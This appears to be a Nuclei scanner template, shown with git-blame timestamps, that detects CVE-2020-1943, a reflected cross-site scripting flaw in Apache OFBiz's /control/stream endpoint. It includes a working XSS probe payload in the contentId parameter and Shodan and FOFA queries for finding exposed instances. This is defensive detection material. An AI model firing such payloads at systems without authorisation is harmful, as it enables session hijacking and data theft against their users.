2021-01-09 14:45:11 +00:00
id : CVE-2020-1943
info :
2022-08-16 14:14:41 +00:00
name : Apache OFBiz <=16.11.07 - Cross-Site Scripting
2021-04-06 06:46:11 +00:00
author : pdteam
2021-01-09 14:45:11 +00:00
severity : medium
2022-08-16 14:14:41 +00:00
description : Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade Apache OFBiz to a version higher than 16.11.07 to mitigate this vulnerability.
2021-03-15 17:13:02 +00:00
reference :
- https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E
2022-05-17 09:18:12 +00:00
- https://s.apache.org/pr5u8
- https://lists.apache.org/thread.html/r034123f2767830169fd04c922afb22d2389de6e2faf3a083207202bc@%3Ccommits.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/r8efd5b62604d849ae2f93b2eb9ce0ce0356a4cf5812deed14030a757@%3Cdev.ofbiz.apache.org%3E
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-1943
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-1943
cwe-id : CWE-79
2024-05-31 19:23:20 +00:00
epss-score : 0.47046
epss-percentile : 0.97448
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : apache
product : ofbiz
2024-06-07 10:04:29 +00:00
shodan-query :
- http.html:"ofbiz"
- ofbiz.visitor=
fofa-query :
- body="ofbiz"
- app="apache_ofbiz"
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,apache,xss,ofbiz
2021-01-09 14:45:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-01-09 14:45:11 +00:00
- method : GET
path :
2022-06-09 04:41:03 +00:00
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
2021-01-09 14:45:11 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-01-09 14:45:11 +00:00
words :
2022-06-09 04:41:03 +00:00
- "<svg/onload=alert(/xss/)>"
2021-01-11 06:44:22 +00:00
2021-01-09 14:45:11 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-01-09 14:45:11 +00:00
words :
2021-01-11 06:44:22 +00:00
- "text/html"
- type : status
status :
2022-01-04 19:34:16 +00:00
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100f659b7284f7cc1621c227e158eb100dcd708c9879f1d7a74ee0e11c97cb0b50002207bec0429a843052f078c86f9e59f992147c3b8457f235e8cc052ef770ce98625:922c64590222798bb761d5b6d8e72950
